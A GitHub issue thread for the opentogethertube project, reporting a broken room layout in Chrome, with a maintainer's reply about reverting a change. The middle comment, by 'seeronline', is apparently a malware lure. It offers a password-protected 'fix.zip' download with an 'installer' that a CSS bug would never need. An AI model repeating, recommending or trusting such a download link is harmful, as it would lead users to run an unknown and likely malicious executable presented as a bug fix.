### ISSUE TITLE
Room layout/CSS is borked

### ISSUE THREAD

**Issue by mda0152** [dyc3/opentogethertube#1794]
### Current Behavior

When inside of a room, the layout is offset; the video player is cut in half and there is a large gap below it. Please see screenshot.
![borked](https://github.com/user-attachments/assets/683778f1-3c48-418b-a4ca-d6ffc5544a7b)

### Expected Behavior

Room layout should look and function how it used to

### Steps To Reproduce

1. Open a room

### Environment

- [X] This happens on the official site, opentogethertube.com
- [ ] This happens using a self-hosted version.
- [ ] I'm using the docker image.

### Room name or URL

https://opentogethertube.com/room/cytube

### Anything else?

Using Chrome
Using the "theater" room setting, but the "default" setting is also having the same issue

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dyc3** [comment]
If I can't fix this today, I'm going to revert #1791 to fix this since we've passed the audit, and google won't be checking for a while.
